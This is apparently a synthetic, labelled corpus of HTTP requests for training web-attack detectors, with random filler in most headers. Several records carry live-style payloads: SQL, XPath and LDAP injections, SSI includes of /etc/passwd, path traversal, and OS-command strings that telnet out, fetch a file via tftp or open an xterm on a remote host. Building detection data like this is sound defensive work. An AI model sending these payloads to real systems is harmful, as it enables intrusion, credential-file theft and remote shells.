Accept-Charset: hz-gb-2312;q=0.7, windows-1254, euc-kr, iso-8859-8-i
Accept-Encoding: <!--    #include    virtual="/etc/httpd/httpd.conf"  -->
Accept-Language: <!-- #include     virtual="/etc/passwd"  -->
Cookie: t1no7=uyQ;ensrdygeod=0135357;cRdf9opftaea=f_eYRr5K;teittdnm7meb=ah1XwXW7U
Date: Sat, 08 Dec 07 06:44:09 CET
ETag: "pu8lYgV.pIZXYGFaW"
Expect: 100-continue
If-Modified-Since: Mon, 15 Nov 04 23:51:41 CET
If-Unmodified-Since: Sun, 25 Jun 06 21:31:58 UTC
If-Range: Thu, 02 Dec 04 09:44:20 UTC
Max-Forwards: 143
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: tEedhq uees=5tus
Authorization: Basic cGFkZWFvYTowbkVoc3VIdQ==
Referer: /gRoinh/icts/tcUt/ties8if.pl
User-Agent: Mozilla/1.9 (compatible; MSIE 9.9; Win98; nnr2cXEnt)
UA-OS: Linux
UA-Color: color32
Via: HTTP/0.2 www.iCiLnhq.htm
Transfer-Encoding: ecoxe
----: -----------

null

End - Id: 39497
Start - Id: 35459
class: SqlInjection
POST /md6lefUgyXdzn3amhzO/sock_streamL8xtermw8/vcopyselect672.asp? HTTP/1.1
Content-Length: 217
Content-Language: uOitn
Content-Encoding: compress
Content-Location: http://www.T6oa.gov/Da5E/AHdeu.shtml
Content-MD5: OUFpdE5xdHR1cmpybm5lUw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 04 Apr 09 20:50:59 UTC
Last-Modified: Sat, 01 Dec 07 22:07:03 UTC
Host: 9.221.13.58
Connection: close
Accept: video/quicktime;q=0.3
Accept-Charset: koi8;q=0.3, iso-8859-6
Accept-Encoding: *
Accept-Language: SlAmfeOs-tald, sbyo-sddvdaar;q=0.6, ro-doaEulit
Cache-Control: min-fresh=214
Client-ip: 254.129.162.228
Cookie: sae='    UNION           ALL      SELECT     31zt5qajrn  FROM  hhaiii  WHERE   ''  ='
Cookie2: $Version="6"
Date: Mon, 12 Nov 07 23:42:50 UTC
ETag: "e1UPMMHybUMF8t3K"
Expect: iia8=6YaoelE6;toeao
From: dwUn52e8@nasl9ehnto.gov
If-Modified-Since: Sat, 21 Jan 06 02:54:07 CET
If-Unmodified-Since: Thu, 22 Dec 05 05:19:39 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 0
MIME-Version: 3.5
Pragma: qcrdc='tgt'
Proxy-Authorization: NTLM ZUxoVW9oYWw5dDRydHdtaXBjc2VhZmllbWN1bW9zZGRsbjh5dWQ=
Authorization: Basic bmFiRDpOeHNwaWw=
Range: 5-745728
Referer: /tU0a/r3f7/eosmihjp.tiff
TE: gzip
Trailer: Host
User-Agent: exdiwsv/8.5
UA-CPU: MIPS
UA-Disp: 0257,0877,16
UA-OS: Windows 95
UA-Color: color8
Via: 5.7 www.tqvjee.tiff
Transfer-Encoding: identity
X-Forwarded-For: 173.40.203.72
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

osz=stmstGut8uhrAnv&titu=rji&Inuniecneu3lo=tZSwe1&lhcVtttoad=o&nrrsct=5384563&erstPypummoevc=6424&ts8B2=26&so=etckmn&al=96221&ozyh6=rtepaesqf4ss&havingHhavingwhereWDBU=wfe2nmnubjt&6h=qtToennhelst&kYMWj1aW2=tpeth&tt=a6

End - Id: 35459
Start - Id: 41352
class: SqlInjection
GET /0uraverd4suh.tiff?sAsu=97320861&sNs=ysakcekLinserte%7Cneo&A3e=bsnxr2i&46xhssiot0t=misy%24&Wyelog=nullil&rtpahalquBwawf=d%3Em&tT=iteeo85rol HTTP/1.1
Host: 75.62.156.125
Connection: a1gcsap
Accept: */*
Accept-Charset: *
Accept-Encoding: compress;q=0.8, compress;q=0.7, deflate, compress;q=0.3
Accept-Language: uzy-As, byoeiu-iAsot5i;q=0.3
Cache-Control: only-if-cached
Client-ip: 234.41.217.140
Cookie: dei=73;@copy7rcHfXopsystemb=29865659;n5ur9='     OR   'teoertsfthu'     <   'X
Cookie2: $Version="5"
Date: Thu, 09 Feb 06 16:06:54 UTC
Expect: urthy7r
If-Unmodified-Since: Thu, 29 Sep 05 19:08:19 UTC
If-None-Match: "ArEgaDcdrGCJz9Km"
If-Range: *
Max-Forwards: 004
Pragma: no-cache
Proxy-Authorization: Basic bm5oamFsdDc6ckl1YWxI
Authorization: ybYama hvafh7g=68ab
Referer: http://snea.uk/wsou381t/wenjETes.gif
TE: deflate,trailers,gzip;q=0.9
User-Agent: astgdtsot
Via: FTP/2.6 www.q4wwdm.gif
Transfer-Encoding: deflate
Warning: 741 133.215.39.138 "eyouNecooi" "Wed, 24 Jan 07 04:28:27 GMT"
X-Forwarded-For: 62.34.7.194
----: ------------------------

null

End - Id: 41352
Start - Id: 35815
class: XPathInjection
GET /sP5PLSPLhNuEjwn/ahhlybrthee/eaE2wt/r9IA_WYsI-hGg/nW9a9.x/g_vTmOMhBgByryUo8v/th5ngnC8nhnrr0.bin?naesoyhem6iNs=2200&fvryaeiogns5oo6=413&aSea=2Emetannbine&eaoni=23816590&WQkGrZYalqa=e3Ttsaso%3Cbinsuioi&eyorsttbwaid3l=e%40H9wW%40ww&emttwcess=nudto%27+or++++count%28++++path%2Fchild%3A%3Anode%28%29%5Bposition%28+++%29%3D%28%28+i++++%2B+j++%2B+k++++%2B+l%2B+1%29%5D++++%7C+++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++++or+++++%27tlcidtq%27++%3D+%27+++mticy%27++++or&9t2i3en45a5dtav=59434&rsng=8bodyt+&mg=ll HTTP/1.0
Host: 202.253.69.78
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.5
Accept-Language: ye9nle-Ll, dtmrme-7;q=0.9, on-tjgzaod
Cache-Control: max-age=58805
Client-ip: 121.212.7.151
Cookie: o7zeida1rmsonle=ts3edH1cisfseSe5te;vEGcn=dassntoArUiFe;dsClr=wglrlt4d8awfnr5hae;2c3oIgrZora=pd$o;nc6=bZ00l
Cookie2: $Version="2"
Date: Sat, 08 Sep 07 21:38:53 CET
ETag: "F.kqxYY8TNuKf1u"
Expect: hr4ene
From: gH0ez@Sireoah.fr
If-Modified-Since: Sat, 27 Nov 04 05:13:25 GMT
If-Unmodified-Since: Sat, 26 Jul 08 01:02:05 UTC
If-Match: "IoOhLtg4v7bU-fuK2D0"
If-None-Match: *
If-Range: "pe.OsHtJFIrMR1m"
Max-Forwards: 750
MIME-Version: 7.4
Pragma: mf2t=easweAts
Proxy-Authorization: luLc Okt8e=3llo
Authorization: tngoD nonMowp=endl4
Range: 205-0247
Referer: http://slw8ti0t.gov/gureio.doc
TE: trailers,deflate,chunked
Trailer: If-None-Match
User-Agent: 8Hio8/2.6
UA-CPU: x86
UA-Disp: 747,476,16
UA-OS: Linux
UA-Pixels: 4135x5853
Via: Best/1.0 87.213.78.85
Transfer-Encoding: compress
Upgrade: oyytm/9.6, hhc/4.5, Ojwace/7.1, toww7E/9.4
Warning: 952 www.gere3lt.gif "ajcLu" "Fri, 03 Aug 07 19:36:17 GMT"
X-Forwarded-For: 43.11.206.228
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35815
Start - Id: 37823
class: LdapInjection
GET /bcxzgaS94184wk/coJe.htm?19imochaj=96237868&bR87c.rPL=hRFg&mrtreanmsl=wEfewgethffe%40rpi&ahzIabaiIoea=htpassr%3D57apositionfsr%29sobjecte&rnHoiymtttaSaq=4enmkldoic&20akEKsO=76393087&ecaenareed=osea%2BDonciefe2i&0uozYVG=95111915&iorza1yxsre=570%29%28%26%28objectClass%3Do8i%29%28%7C%28sn++++%3Dsstl%29%28cn%3Dsm++J*%29%29&etpE8tcyet=0&lBvearasacjt6nn=rHARnS&hnofchp6ag=i8&vh8etioosb97i=1391082&6a=74310&mr=zatsmbbetweenlroslo HTTP/1.0
Host: www.oo9sgnQeus.net:80
Connection: close
Accept: text/*;q=0.6, image/*;q=0.3
Accept-Charset: isiri-3342;q=0.0, x-mac-ce;q=0.5, x-mac-arabic;q=0.0, hz-gb-2312, macintosh
Accept-Encoding: 
Accept-Language: ssro-slo0, v-teStafr, ioheytda-refbas;q=0.1, oa-Erw;q=0.7, penL7-euui
Cache-Control: max-stale
Client-ip: 68.129.230.145
Cookie: uogtr5dh1c=0Bwghmo4I;an3=r;pfrn=523;ae29T13B5nslu=rIoe
Cookie2: $Version="16"
Date: Sun, 15 Feb 09 19:29:57 GMT
ETag: "Ob3LephYBYDp-6jiyC"
Expect: 100-continue
From: oltCtuc@anfmtcot1m.gov
If-Modified-Since: Wed, 27 May 09 06:51:16 CET
If-Unmodified-Since: Wed, 23 May 07 20:23:35 GMT
If-Match: *
If-None-Match: *
If-Range: "hT0..GSfvGJaO_91M0"
Max-Forwards: 8
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: Digest uri=/newerY/iesL.bin
Authorization: Digest response="c6cbD7a8F5Ac51D724EE96e3fF8cAa66"
Range: 09106-2,27777-,7807-
Referer: http://www.ptmeeEu.ch/rcna/snWS/1oitpbi/reretah/lls5.tar.gz
TE: trailers,gzip
Trailer: TE
User-Agent: twoTa (p56a7qoJ9; 8DaXPNeRn; iPmA_Hs7x)
UA-CPU: x86
UA-Disp: 0815,794,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 2010x029
Via: FTP/7.0 www.lepme.htm, HTTP/3.7 162.134.129.149, 9.8 239.54.217.247
Transfer-Encoding: deflate
Upgrade: otieS/1.0, omtz/5.9, e54a/7.2
Warning: 166 78.105.41.24 "sewleo7lheo" "Tue, 16 Jun 09 20:36:56 UTC"
X-Forwarded-For: 178.127.38.107
X-Serial-Number: 9737658238850824210
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37823
Start - Id: 37009
class: LdapInjection
GET /h0/WreiesYnarA3AanEkvt.png?s4erensebc=271519241&seib4eXs=%29+%28+++%7C++%28++cn%3D*o+++%27brien*++++%29%28mail++%3D*o%27brien*+++%29+++ HTTP/1.0
Host: www.0eeje9.cz
Connection: close
Accept: */*
Accept-Charset: gb2312;q=0.9
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: max-stale=30874
Client-ip: 134.238.253.203
Cookie: 6ae=46407;te1io5301IorE=nfftp;rqauin=91742;eot8irw=5265145;ysthuoeoi=|5;urnt=14
Cookie2: $Version="25"
Date: Tue, 11 Oct 05 17:53:19 UTC
ETag: "wRhCcv9Re9WpU6WH86K1"
Expect: 100-continue
From: st3n9olp@e3y5lez.cz
If-Modified-Since: Sun, 20 Jan 08 11:01:09 GMT
If-Unmodified-Since: Sat, 21 Mar 09 01:52:59 CET
If-Match: "zFOJ.NrHrc-sNXWN_W2d"
If-None-Match: "ToxdwizwbQJF.UzWqV"
If-Range: Sat, 27 Sep 08 17:09:04 GMT
Max-Forwards: 755
MIME-Version: 6.2
Pragma: h='Mlihd'
Proxy-Authorization: NTLM bjhjeWN6aXRhb2VyY2VzcnBvOXloU2Y1dnJsdGhsNnRyOG5pb2N4TE4=
Authorization: NTLM cGxyT25vaHU2OWFtc2ppaThodDdqWW1oekNjbHdlUmFlc2JlYWZlU2V0WWV0
Range: 11-,-9658
Referer: /cnn0/8sOeo/ruEipw.tar.gz
TE: gzip;q=0.0
Trailer: Cache-Control
User-Agent: hhm3d/9.9.5.9.4
UA-CPU: PowerPC
UA-Disp: 720,086,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 8274x205
Via: oTSxty/6.0 99.132.203.176, dIslI/6.3 168.220.250.97:278, FTP/1.0 127.41.98.70:15440
Transfer-Encoding: 2ril2; eaqc=nanho
Upgrade: dho/9.5, 3oax/1.9
Warning: 992 www.dyteeg.tiff "riPlyr" 
X-Forwarded-For: 164.143.217.25
X-Serial-Number: 4092233930
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37009
Start - Id: 43311
class: OsCommanding
GET /owa/2erajn1sazeis.php4?wget2s4gB=%22+++%3B+++++telnet+223.216.86.59+++++80+++%3B&JdkmetainzE=j&ne=dadmine&o4t=oephiosqYacceptfeii8&0eteiia=8&MeTu7tmpJF=sMalt1zWTa2&SJ0wSl5SZG5=4754&ca=%7E6ej HTTP/1.1
Host: 107.239.116.150:80
Connection: close
Accept: text/*;q=0.1, video/mpeg, video/*;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ti-3tEu;q=0.5, t-we3cnrw;q=0.1, st9-gsss
Cache-Control: no-cache
Client-ip: 39.60.249.69
Cookie: FF_include7=98986;ralunn=oz;f7rx2mswtae0tTr=5xh4Ut;gldtHux=inrT ls?selectupositionaperln
Cookie2: $Version="675"
Date: Wed, 01 Feb 06 21:54:45 GMT
ETag: "8tYmBLFfcCT-OoAu"
Expect: 100-continue
From: ehhmnsme@ohym.uk
If-Modified-Since: Mon, 05 Nov 07 12:07:17 GMT
If-Unmodified-Since: Thu, 12 Jun 08 09:10:20 GMT
If-Match: "Rr81IA-0J64xq0LeDK"
If-None-Match: "Cnw2pKc5XwP8oYoYTx"
If-Range: Mon, 19 Sep 05 05:23:10 UTC
Max-Forwards: 153
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: Basic U3Nub2VzZ3U6MXRsNmFlaG8=
Authorization: alkai vodbytu=ohto
Range: 398265-
Referer: http://www.lsisaaoe.com/Buswlnn/mfwv/ueieh/1rsvmnnn.dll
TE: trailers,chunked;q=0.3
Trailer: Cache-Control
User-Agent: 2uuayds/3.6.4.0.9
UA-CPU: StrongARM
UA-Disp: 260,218,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 3321x719
Via: ewt/6.6 www.Risghrds.htm
Transfer-Encoding: deflate
Upgrade: eCaleh/5.6, orv/6.7, AtlTSf/2.9, td7/4.6
Warning: 597 167.142.104.140 "ureioenlrkas6ps" 
X-Forwarded-For: 213.135.117.46
X-Serial-Number: 0027347
----: -------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 43311
Start - Id: 46314
class: PathTransversal
GET /onOFtHsJN/aexb3urrms/ifgsuh/d52nmsRretqIeiaieeh/Stmp2pkJV1m/hwiIYGa2fk4bfft7/o6QoAEo9V3GZz/or6aasmnn8/yeieibabT/rastle/ccnhno2f/3Om.css?viframe0ZIuvfFiprocessing-instruction=cegI8G&e07vevicMgguoe=%2F%2C%2C%2C%2Fgfcgl%2FAd%2Fpasswd&MdnobiTe0m=bhae%3Dpetfmy&EehaSecxepvrf=6005004668&3hetfesPWl=bodchottloaraBh&9UZ2esmetadrop=880380153&utlp=sgt9GYasxtermaHsa&iWrihax8hamDw1n=fpftpt HTTP/1.1
Host: www.netXr.biz
Connection: aultetri
Accept: text/xml, audio/basic
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 208.222.203.198
Cookie: oriTku=ec sxt hnrkf;TR1sD=d5n5Wlbw;YCOwDv=rqlib;ey8a=5399609
Cookie2: $Version="6"
Date: Mon, 06 Feb 06 11:46:01 UTC
ETag: "-GzYbTKa0ciTQ3FJ"
Expect: 100-continue
From: twei@aedq.de
If-Modified-Since: Tue, 09 Oct 07 03:35:17 CET
If-Unmodified-Since: Thu, 08 Jan 04 12:37:16 GMT
If-Match: "Qwfa1QdWXZiU4g4U@M"
If-None-Match: *
If-Range: Mon, 11 May 09 16:02:32 CET
Max-Forwards: 6
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: Digest response="c973fB96c44fD6a45864DFA7cb1fB18f"
Authorization: Digest nc=5F2E8d2F
Range: 426-9089,-721
Referer: /ttdAnp/errtaum.doc
TE: trailers
Trailer: Warning
User-Agent: Mozilla/0.2 (Windows; U; Windows NT 2.6; ps-eS; rv:2.0.4) Gecko/79383345
UA-CPU: Sparc
UA-Disp: 0145,4311,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 434x579
Via: 2.5 66.111.4.180, tIo/8.1 114.146.227.57:61
Transfer-Encoding: identity
Upgrade: edsi/9.9, 3eM/0.4, attaq/3.5, srnheu/2.0
Warning: 721 www.wehenl.jpeg "muIpoPasigatRbg" "Sun, 26 Jun 05 21:53:54 CET"
X-Forwarded-For: 189.150.137.247
X-Serial-Number: 4859376671430624
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46314
Start - Id: 48326
class: XPathInjection
GET /asom205XWgjog@Q8/6vEushutdownMscriptFud/ny@yj8F_Jkee95W/aoorE6M/00NISkW/hteaTHpwWu49H/aHO-qzTxRBIYx23-Df/c8g5.aspx?hddatIf0t2Cor=tliohhnniae7cohww HTTP/1.0
Host: 115.56.21.128
Connection: close
Accept: image/gif;q=0.7, application/*
Accept-Charset: x-mac-arabic;q=0.9
Accept-Encoding: compress;q=0.5, identity;q=0.1, identity
Accept-Language: cme'   or   count(  path/child::node()[position(  )=((  i+  j    + k  +    l +    1)]     | path/child::*()[position()=(k+1)])=1  or  'zt'   = '  smUny'  or
Cache-Control: no-transform
Client-ip: 54.114.15.189
Cookie: gn=+p'da?1[@mdocumento
Cookie2: $Version="145"
Date: Tue, 13 Nov 07 18:12:53 GMT
ETag: W/"0Yak.Ku@h3TCPPnGQ"
Expect: 100-continue
From: tlgvoTUc@weaHAo.be
If-Modified-Since: Thu, 25 Mar 04 19:12:12 GMT
If-Unmodified-Since: Thu, 05 Jan 06 02:23:19 UTC
If-Match: "AzxuhRvKnhDpY@uBJ"
If-None-Match: *
If-Range: *
Max-Forwards: 0688
MIME-Version: 8.9
Pragma: pidOnDe='t6ibi'
Proxy-Authorization: dneDtg c5itec=enfiila
Authorization: NTLM UEFjbm0xZTRlN3Nub25tcm5jYW0yb2llcmFpaXRmbnRFeWVjZUVsbm9l
Range: 200729-
Referer: http://httarwa.fr/ngethg/ziwoerai.conf
TE: gzip,trailers
Trailer: If-Modified-Since
User-Agent: tse6o/0.8.1.6.1
UA-Disp: 296,6544,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 433x249
Via: 0.4 159.100.180.107
Transfer-Encoding: compress
Upgrade: ggwu/8.7, eaee/3.4, wiazc/3.1, tznuol/7.6, gfi/8.6
Warning: 589 97.236.200.85 "tutzsttjueassase" "Sat, 28 Mar 09 19:51:19 CET"
X-Forwarded-For: 190.33.188.59
X-Serial-Number: 278748120266538
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48326
Start - Id: 43660
class: OsCommanding
POST /naaiTlos3enmmfafji/9JTFkS@YewM4/oi0n7Dnmn63sfyrr/vzyeEdex0Tjhin89sre/iI1GS-pvZWCRt@mxn2/sOon7ohnsat/lF.bDw/ry/uUQ5i@g@ftHP8LFd7y/ifNb95selectXaOM/e8JwoY8muztU/r0tl2refntovedepdcs.swf? HTTP/1.1
Content-Length: 115
Content-Language: dcavhdYL
Content-Encoding: identity
Content-Location: http://www.soel9itr.uk/a5ihmot/tenoaoAE/atoi/redlhni/Hiet0i.tiff
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 20 Jul 04 14:21:52 UTC
Host: 111.46.110.80
Connection: pooaUe
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Cookie: u7eteld=rcp;-Nih;oqetmnhoda=aopceeeytt;9n=4607;W-M8-=\r    xterm  -display   59.49.238.109:0.0
Date: Sat, 16 Aug 08 04:14:11 GMT
If-Unmodified-Since: Wed, 10 Mar 10 14:26:09 CET
If-Match: "jkHFPbannI0uukfRC"
If-Range: *
Max-Forwards: 02
Referer: /nianmbb/stcOo/eoBridia/2iii/8c7ldF.mpeg
User-Agent: n4PB6HPjdj http://www.trqsn8sn.uk
UA-Disp: 232,8736,32
Via: 7.6 255.198.222.74
Transfer-Encoding: Eaoo; flCed=a2odv6o
~~~~~: ~~~~~~~~~~~~~~~~~~~~

oCierstm=rIKvd.&noiWasrllzl=Ps8Fiotno7aE&rmafnzbsr=~-&asnaw2g38ed=43&ia8naorpqngtu=965&esoeHai=djnpyerAIs Etdalrs

End - Id: 43660
Start - Id: 38948
class: LdapInjection
GET /sHqTlrNchu2/oEUdBM/nCMzFr-Zml811o/wtrenyiRt/5CbZqyyJpf/o8iRIXFuiUEgiai.jpeg?tcago=jfsL&Vbinp7_XzdivC=rQXrs6SrJ0&de=Te%29%28%7C+%28yAv9z%3D*%29 HTTP/1.0
Host: 47.241.193.173
Connection: aeiYa8eh
Accept: */*;q=0.2
Accept-Charset: utf-8, windows-1251;q=0.6, windows-874, cp-950;q=0.8, shift_jis
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: max-stale=451
Client-ip: 15.183.96.232
Cookie: o6dor0ese=Eeltngue3ulwnh;MqAsystemk8CI=svnALMwTN;Vd27=y;uetrEiaonr=Swr=o4td<me atx wl;e9srMrr=07
Cookie2: $Version="518"
Date: Fri, 02 Jun 06 14:05:26 CET
ETag: "WKPLBEw6tCGAk9Pt"
Expect: eorde=huweRemi
From: merdf@ssdhtag.cz
If-Modified-Since: Thu, 13 Jan 05 12:06:02 GMT
If-Unmodified-Since: Mon, 09 Nov 09 09:07:09 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 51
MIME-Version: 6.2
Pragma: no-cache
Proxy-Authorization: Basic cncwbnU6dHRpSGFhd28=
Authorization: Basic ZTFhbHI6c2FoMmlzdA==
Range: 678-706492,70758-,6439-
Referer: /BmrE6u4J/wienNebt/jlhchan/nrrtnwrc/Hmrt.txt
TE: trailers,trailers,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/2.6 (X11; U; Linux i586 3.1; tm-wo; rv:8.0.9) Gecko/62793464
UA-CPU: 68000
UA-Disp: 4990,2701,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 0621x5666
Via: 6.1 www.fnnles.html:56082
Transfer-Encoding: compress
Upgrade: aumoe/1.5, dnssn/0.3, Dor/2.3, gn5rt/2.8, thvAr/2.4
Warning: 766 39.53.21.205 "etnwdeh" "Thu, 10 Nov 05 22:23:35 UTC"
X-Forwarded-For: 97.3.123.50
X-Serial-Number: 498357729
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38948
Start - Id: 48909
class: XPathInjection
GET /ddEGaleQMBB/rCKz/y1q6k3volGBayfz/Dttoti7sb/na0r7nUD5UR72/dm/tGSt24A2YRMm4UU/rMxznl7a3g13.Twz6p.mdb?kppAaIOzL.bK=ieri%2Ft%2Ftee%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D3%5D++++or++%27eDopledc%27%3D%27 HTTP/1.1
Host: 248.145.185.93:48
Connection: close
Accept: text/*, application/*, image/jpeg
Accept-Charset: *;q=0.1
Accept-Encoding: *
Accept-Language: 0iao-bd;q=0.7, tdoe-lseeYv;q=0.9, ccdn-ssn
Cache-Control: max-age=3
Client-ip: 27.145.34.50
Cookie: h6ormttiylYy3=62004;Nouoe=lelgaum
Cookie2: $Version="0"
Date: Thu, 01 Jul 04 19:51:51 GMT
ETag: W/"DEMXpzK3ZKUSrwpqiv9"
Expect: alsrgDt=Ugteta;eyxh2
From: nui8@hgERemx.net
If-Modified-Since: Wed, 13 Jul 05 13:44:40 UTC
If-Unmodified-Since: Wed, 07 Apr 04 05:57:53 CET
If-Match: "T@_sxNfq59Hr3pi"
If-None-Match: *
If-Range: *
Max-Forwards: 3
MIME-Version: 2.9
Pragma: 3='jocDisn'
Proxy-Authorization: Basic blRlaDBtazp0eGVrcDBpNg==
Authorization: NTLM ZWhlbWdiaWh0cWh4YWs5ZWVvOWVwcmR0YTBOdHkzZXQ1M2Vjcm9uQ2g4
Range: 87-22
Referer: /uio6Uhnq/no4tn8ee/er9aoee.cfm
TE: gzip;q=0.7,trailers,gzip;q=0.4
Trailer: Warning
User-Agent: roRh (cFR61L; f_KhLc; o4uLnt4u; sJ5SG0r; e9anlQU49P)
UA-CPU: PowerPC
UA-Disp: 8730,583,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 3997x7266
Via: FTP/5.6 209.101.34.97:58625, 7.8 36.246.113.99, 1.9 www.wonipier.html
Transfer-Encoding: deflate
Upgrade: ltr/8.5, jsTkgd/0.2
Warning: 099 www.eSitghtc.htm "2nttveexd" "Tue, 21 Sep 04 15:34:20 CET"
X-Forwarded-For: 1.220.148.94
X-Serial-Number: 566436568089581
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48909
Start - Id: 43530
class: OsCommanding
GET /nee0uOne/t-zKJe7/soreiAv/03/fromPXperlVR0FDB6LFq.js?Nperlvy=%27+%3B+++tftp+++-c+++get+www.eliela.com%3A%2Fmensisan.tar&tiIepswa6ecB=4495&665SGesupdatesystemxtermM=37976838&e6esiEhg1meo=u&w_k@window.open0YU=fDexn%3Fteaosorreete%29a&somtiaziusN=31691&nfiM7uonl=rsohe5&6m=rilg&cctui=13004&sibtRnUaigwB=913617&HHo=9tsPl&Itveyae=cE6&5onrcrb=logdelete HTTP/1.1
Host: 75.159.240.80
Connection: keep-alive
Accept: audio/*;q=0.0
Accept-Charset: iso-8859-4, koi8;q=0.1, euc-cn, utf-8;q=0.6
Accept-Encoding: *
Accept-Language: I-qziqo, fnI8orn-evaihv, t5-EehApd, hg-n;q=0.7
Cache-Control: min-fresh=6389
Client-ip: 214.70.1.175
Cookie: stunteIu=auoam+B?ot2a13AxmlC9;Cjz.PaHL=byvelJYJCXgX
Cookie2: $Version="7"
Date: Sat, 08 Sep 07 08:35:39 GMT
ETag: "UAFD_rfS4Io.UVHK"
Expect: hhdoic
From: se0nS@elUienypa.de
If-Modified-Since: Thu, 03 Mar 05 02:41:30 UTC
If-Unmodified-Since: Tue, 02 May 06 20:24:44 CET
If-Match: *
If-None-Match: "8ghp6dkd5PT6QcxKx3jU"
If-Range: Mon, 05 Jan 04 15:36:36 UTC
Max-Forwards: 434
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: Basic QWFhaWM6cm5pb0Ez
Authorization: armsts enih=saae
Range: -983461,45-31195
Referer: http://dcsrhesi.it/gossptt/rxfoA/Eacs.jpeg
TE: gzip;q=0.3,trailers,chunked;q=0.2
Trailer: Expect
User-Agent: dcdk@if http://www.ceei4i.uk
UA-CPU: PowerPC
UA-Disp: 230,276,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 0263x175
Via: 0.4 141.215.185.80, 8.7 202.95.9.21, 6.3 21.247.175.81
Transfer-Encoding: deflate
Upgrade: hlpxo/5.8, ate/4.1, k9h/8.3, atf7/2.6
Warning: 156 193.81.211.74 "9aeu3wesnnaer" 
X-Forwarded-For: 118.79.162.108
X-Serial-Number: 00610632074
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 43530
Start - Id: 42219
class: SqlInjection
GET /iek.OkzBcl4O3L10/QKDqmochaVF/izdJlyu2J2n8nI9ug/5aDchildbetweenGhKLbg5u.mspx?Baq=+boot.iniMoy%3FsS&ooet1ee3tvoc=8044&nfneu=Tibnoptxtermtj%40hu&7ve=1&vtusgzeet=1&lhifat=ecrN&2Bdkaeanjasn=752&alctvoEnyoOnsj=OR++++%2751lwlfii%27++++%3D++%27++%27&ohyensaif=emlexec&crcwnfaShS6hd=9gel&senust=+%7Etianytet1ohesuttt9&o5dqji5usaty=betweency HTTP/1.1
Host: www.ttdte.cz
Connection: close
Accept: application/zip;q=0.7
Accept-Charset: iso-8859-7;q=0.9
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: no-store
Client-ip: 97.137.241.136
Cookie: WoCS=e) lwu-0iprw
Cookie2: $Version="35"
Date: Fri, 15 Jun 07 20:15:45 CET
ETag: W/"tXiGyLYJXuOw39ER0"
Expect: cttahr1o
From: 6bttom@2kOpyg.org
If-Modified-Since: Wed, 16 Aug 06 18:22:05 CET
If-Unmodified-Since: Mon, 05 Jun 06 09:27:29 CET
If-Match: "NCKukWukmNVxIKFT5p"
If-None-Match: "E@mk8FxwZdsOt_Ws.L6"
If-Range: Thu, 17 Dec 09 03:59:25 CET
Max-Forwards: 3
MIME-Version: 0.3
Pragma: ateTrT='n'
Proxy-Authorization: Basic emg1ZWk5ZWE6NHNMZWdEdTk=
Authorization: Digest response="3dFEc973fFBDaf8DdAccD8fD761432C3"
Range: -66
Referer: http://www.zrhc.fr/ne1Ezm/dEic/nntE4hi.msf
TE: trailers
Trailer: Max-Forwards
User-Agent: Uin8sedexn/9.5.3.8
UA-CPU: x86
UA-Disp: 814,8344,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 451x3766
Via: FTP/8.0 www.4He8ilw.shtml, 1d5eu/3.8 76.171.56.196, 6.0 123.216.0.165:62
Transfer-Encoding: identity
Upgrade: s1sE/7.8, ytaat/3.7, hNej/0.0
Warning: 805 www.oCYoru.jpg "crToo" "Wed, 13 Feb 08 17:50:20 GMT"
X-Forwarded-For: 3.212.183.96
X-Serial-Number: 32378960313
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42219
Start - Id: 40721
class: SSI
POST /ngnovhutr5/oh0thets9Lagtei/EeeertkEqno7/tc@pJVTNyy_zED2YK8yW/fYkea2gos4waon/.D.tiff? HTTP/1.0
Content-Length: 130
Content-Encoding: gzip
Content-Location: /otOtb6qq/Aebm/7heseet/h6t6/nemO.mp3
Content-MD5: aWhrbkY4ZXJldG81bDZzaA==
